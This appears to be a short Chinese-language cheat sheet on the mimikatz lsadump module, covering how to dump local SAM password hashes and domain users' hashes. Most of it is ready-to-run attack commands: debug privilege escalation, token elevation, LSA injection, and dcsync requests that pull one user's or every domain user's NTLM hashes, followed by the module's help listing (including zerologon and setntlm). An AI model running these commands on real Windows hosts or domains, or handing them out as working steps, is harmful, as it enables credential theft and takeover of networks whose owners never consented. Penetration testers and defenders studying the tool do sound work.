mimikatz

文章目录

1. 1. lsadump
   1. 1.1. 命令帮助
   2. 1.2. 获取本地用户 hash
   3. 1.3. 获取域用户

概述：mimikatz 项目使用及解析

lsadump

在线帮助手册 Mimikatz 🥝 | The Hacker Tools #手册

命令帮助

lsadump::?

获取本地用户 hash

# 提权
privilege::debug

# 读取sam
lsadump::sam

# 使用注入的方式获取
lsadump::sam /inject

# 查看帮助手册
mimikatz # lsadump::
ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !

Module :        lsadump
Full name :     LsaDump module

             sam  -  Get the SysKey to decrypt SAM entries (from registry or hives)
         secrets  -  Get the SysKey to decrypt SECRETS entries (from registry or hives)
           cache  -  Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
             lsa  -  Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)
           trust  -  Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)
      backupkeys
          rpdata
          dcsync  -  Ask a DC to synchronize an object
        dcshadow  -  They told me I could be anything I wanted, so I became a domain controller
         setntlm  -  Ask a server to set a new password/ntlm for one user
      changentlm  -  Ask a server to set a new password/ntlm for one user
         netsync  -  Ask a DC to send current and previous NTLM hash of DC/SRV/WKS
        packages
             mbc
       zerologon
   postzerologon

获取域用户

参考文章：

• 导出域内用户hash的几种方法-腾讯云开发者社区-腾讯云

# 提权
privilege::debug

# 获取token权限
token::elevate

# 执行注入
lsadump::lsa /inject

# 读取sam
lsadump::dcsync /user:username

# 使用注入的方式获取指定用户
lsadump::dcsync /user:username /inject

# 获取域内所有用户
lsadump::dcsync /domain:test.com /all /csv